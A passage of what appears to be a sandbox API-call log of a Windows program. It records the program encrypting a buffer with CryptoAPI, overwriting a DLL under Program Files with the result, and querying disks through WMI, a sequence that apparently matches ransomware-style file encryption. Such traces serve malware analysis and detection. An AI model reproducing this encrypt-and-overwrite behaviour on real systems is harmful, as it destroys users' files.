Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bceddc*=0x7a9970) returned 1 [0195.042] CryptGenRandom (in: hProv=0x7a9970, dwLen=0x10, pbBuffer=0x33f3df4 | out: pbBuffer=0x33f3df4) returned 1 [0196.622] CryptImportKey (in: hProv=0x7a9970, pbData=0x35da21c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcedac | out: phKey=0x6bcedac*=0x77b570) returned 1 [0196.622] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.622] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.622] CryptDuplicateKey (in: hKey=0x77b570, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bced9c | out: phKey=0x6bced9c*=0x77b5b0) returned 1 [0196.622] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.622] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x4, pbData=0x35da2fc*=0x1, dwFlags=0x0) returned 1 [0196.622] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x1, pbData=0x35da2c8, dwFlags=0x0) returned 1 [0196.635] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8fe5380*, pdwDataLen=0x6bcee08*=0x14e770, dwBufLen=0x14e770 | out: pbData=0x8fe5380*, pdwDataLen=0x6bcee08*=0x14e770) returned 1 [0196.646] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35da324*, pdwDataLen=0x6bcee10*=0x0, dwBufLen=0x10 | out: pbData=0x35da324*, pdwDataLen=0x6bcee10*=0x10) returned 1 [0196.849] CryptDestroyKey (hKey=0x77b570) returned 1 [0196.849] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0196.849] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0196.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bce880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0196.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced74) returned 1 [0196.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0196.850] GetFileType (hFile=0x3dc) returned 0x1 [0196.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced70) returned 1 [0196.850] GetFileType (hFile=0x3dc) returned 0x1 [0196.850] WriteFile (in: hFile=0x3dc, lpBuffer=0x2d0e1088*, nNumberOfBytesToWrite=0x14e980, lpNumberOfBytesWritten=0x6bcee30, lpOverlapped=0x0 | out: lpBuffer=0x2d0e1088*, lpNumberOfBytesWritten=0x6bcee30*=0x14e980, lpOverlapped=0x0) returned 1 [0197.481] CloseHandle (hObject=0x3dc) returned 1 [0197.511] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0197.511] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0197.511] CoTaskMemFree (pv=0x9825530) [0197.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0197.511] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedb0 | out: ppv=0x6bcedb0*=0x72015c) returned 0x0 [0197.512] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bceda8 | out: pAptType=0x6bceda8*=1) returned 0x0 [0197.512] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedac | out: ppvObject=0x6bcedac*=0x0) returned 0x80004002 [0197.512] IUnknown:Release (This=0x72015c) returned 0x1 [0197.513] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce718 | out: ppv=0x6bce718*=0x6737088) returned 0x0 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce930 | out: ppvObject=0x6bce930*=0x0) returned 0x80004002 [0197.513] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737088, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce944 | out: ppvObject=0x6bce944*=0x6738690) returned 0x0 [0197.513] WbemDefPath:IUnknown:Release (This=0x6737088) returned 0x0 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce564 | out: ppvObject=0x6bce564*=0x6738690) returned 0x0 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce520 | out: ppvObject=0x6bce520*=0x0) returned 0x80004002 [0197.513] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde7c | out: ppvObject=0x6bcde7c*=0x0) returned 0x80004002 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde2c | out: ppvObject=0x6bcde2c*=0x0) returned 0x80004002 [0197.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde38 | out: ppvObject=0x6bcde38*=0x9820d38) returned 0x0 [0197.513] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820d38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde40 | out: pCid=0x6bcde40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.514] WbemDefPath:IUnknown:Release (This=0x9820d38) returned 0x3 [0197.514] CoGetContextToken (in: pToken=0x6bcde98 | out: pToken=0x6bcde98) returned 0x0 [0197.514] CoGetContextToken (in: pToken=0x6bce2a0 | out: pToken=0x6bce2a0) returned 0x0 [0197.514] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce330 | out: ppvObject=0x6bce330*=0x0) returned 0x80004002 [0197.514] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0197.514] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0197.514] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0197.514] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0197.514] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x6bcec58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec54 | out: ppvObject=0x6bcec54*=0x6738690) returned 0x0 [0197.514] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0197.514] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0197.514] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedd8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd8*=0x20, pszText=0x0) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6bcedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6bced5c | out: puCount=0x6bced5c*=0x0) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bced48 | out: puCount=0x6bced48*=0x2) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0x0, pszText=0x0 | out: puBuffLength=0x6bced44*=0xf, pszText=0x0) returned 0x0 [0197.514] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.514] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcecf8 | out: ppv=0x6bcecf8*=0x72015c) returned 0x0 [0197.515] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcecf0 | out: pAptType=0x6bcecf0*=1) returned 0x0 [0197.515] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x0) returned 0x80004002 [0197.515] IUnknown:Release (This=0x72015c) returned 0x1 [0197.515] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce660 | out: ppv=0x6bce660*=0x6736f48) returned 0x0 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce878 | out: ppvObject=0x6bce878*=0x0) returned 0x80004002 [0197.516] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce88c | out: ppvObject=0x6bce88c*=0x6738bd0) returned 0x0 [0197.516] WbemDefPath:IUnknown:Release (This=0x6736f48) returned 0x0 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4ac | out: ppvObject=0x6bce4ac*=0x6738bd0) returned 0x0 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce468 | out: ppvObject=0x6bce468*=0x0) returned 0x80004002 [0197.516] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcddc4 | out: ppvObject=0x6bcddc4*=0x0) returned 0x80004002 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdd74 | out: ppvObject=0x6bcdd74*=0x0) returned 0x80004002 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdd80 | out: ppvObject=0x6bcdd80*=0x9820d28) returned 0x0 [0197.516] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820d28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdd88 | out: pCid=0x6bcdd88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.516] WbemDefPath:IUnknown:Release (This=0x9820d28) returned 0x3 [0197.516] CoGetContextToken (in: pToken=0x6bcdde0 | out: pToken=0x6bcdde0) returned 0x0 [0197.516] CoGetContextToken (in: pToken=0x6bce1e8 | out: pToken=0x6bce1e8) returned 0x0 [0197.516] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce278 | out: ppvObject=0x6bce278*=0x0) returned 0x80004002 [0197.516] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0197.517] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0197.517] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0197.517] CoGetContextToken (in: pToken=0x6bcead0 | out: pToken=0x6bcead0) returned 0x0 [0197.517] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x6bceba0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bceb9c | out: ppvObject=0x6bceb9c*=0x6738bd0) returned 0x0 [0197.517] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0197.517] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0197.517] WbemDefPath:IWbemPath:SetText (This=0x6738bd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0197.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x6bced20 | out: puCount=0x6bced20*=0x2) returned 0x0 [0197.517] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6bced1c*=0x0, pszText=0x0 | out: puBuffLength=0x6bced1c*=0xf, pszText=0x0) returned 0x0 [0197.517] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6bced1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.517] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced20 | out: ppv=0x6bced20*=0x72015c) returned 0x0 [0197.517] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced18 | out: pAptType=0x6bced18*=1) returned 0x0 [0197.517] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced1c | out: ppvObject=0x6bced1c*=0x0) returned 0x80004002 [0197.517] IUnknown:Release (This=0x72015c) returned 0x1 [0197.518] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce940 | out: ppv=0x6bce940*=0x672f1d8) returned 0x0 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bceb58 | out: ppvObject=0x6bceb58*=0x0) returned 0x80004002 [0197.518] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb6c | out: ppvObject=0x6bceb6c*=0x6736e68) returned 0x0 [0197.518] WbemLocator:IUnknown:Release (This=0x672f1d8) returned 0x0 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce78c | out: ppvObject=0x6bce78c*=0x6736e68) returned 0x0 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce748 | out: ppvObject=0x6bce748*=0x0) returned 0x80004002 [0197.518] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0a4 | out: ppvObject=0x6bce0a4*=0x0) returned 0x80004002 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce054 | out: ppvObject=0x6bce054*=0x0) returned 0x80004002 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce060 | out: ppvObject=0x6bce060*=0x0) returned 0x80004002 [0197.518] CoGetContextToken (in: pToken=0x6bce0c0 | out: pToken=0x6bce0c0) returned 0x0 [0197.518] CoGetContextToken (in: pToken=0x6bce4c8 | out: pToken=0x6bce4c8) returned 0x0 [0197.518] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce558 | out: ppvObject=0x6bce558*=0x0) returned 0x80004002 [0197.518] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0197.519] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0197.519] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0197.519] CoGetContextToken (in: pToken=0x6bcea98 | out: pToken=0x6bcea98) returned 0x0 [0197.519] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x6bceb68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bceb64 | out: ppvObject=0x6bceb64*=0x6736e68) returned 0x0 [0197.519] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0197.519] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0197.519] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x6bcecfc | out: puCount=0x6bcecfc*=0x2) returned 0x0 [0197.519] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x6bcecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcecf8*=0xf, pszText=0x0) returned 0x0 [0197.519] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x6bcecf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcecf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.519] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcebd4 | out: ppv=0x6bcebd4*=0x6737028) returned 0x0 [0197.519] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737028, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bcec68 | out: ppNamespace=0x6bcec68*=0x6748264) returned 0x0 [0198.606] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb04 | out: ppvObject=0x6bceb04*=0x781634) returned 0x0 [0198.606] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781634, pProxy=0x6748264, pAuthnSvc=0x6bceb54, pAuthzSvc=0x6bceb50, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c, pImpLevel=0x6bceb3c, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44 | out: pAuthnSvc=0x6bceb54*=0xa, pAuthzSvc=0x6bceb50*=0x0, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c*=0x6, pImpLevel=0x6bceb3c*=0x2, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44*=0x1) returned 0x0 [0198.606] WbemLocator:IUnknown:Release (This=0x781634) returned 0x1 [0198.606] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf8 | out: ppvObject=0x6bceaf8*=0x781654) returned 0x0 [0198.606] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf4 | out: ppvObject=0x6bceaf4*=0x781634) returned 0x0 [0198.606] WbemLocator:IClientSecurity:SetBlanket (This=0x781634, pProxy=0x6748264, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, 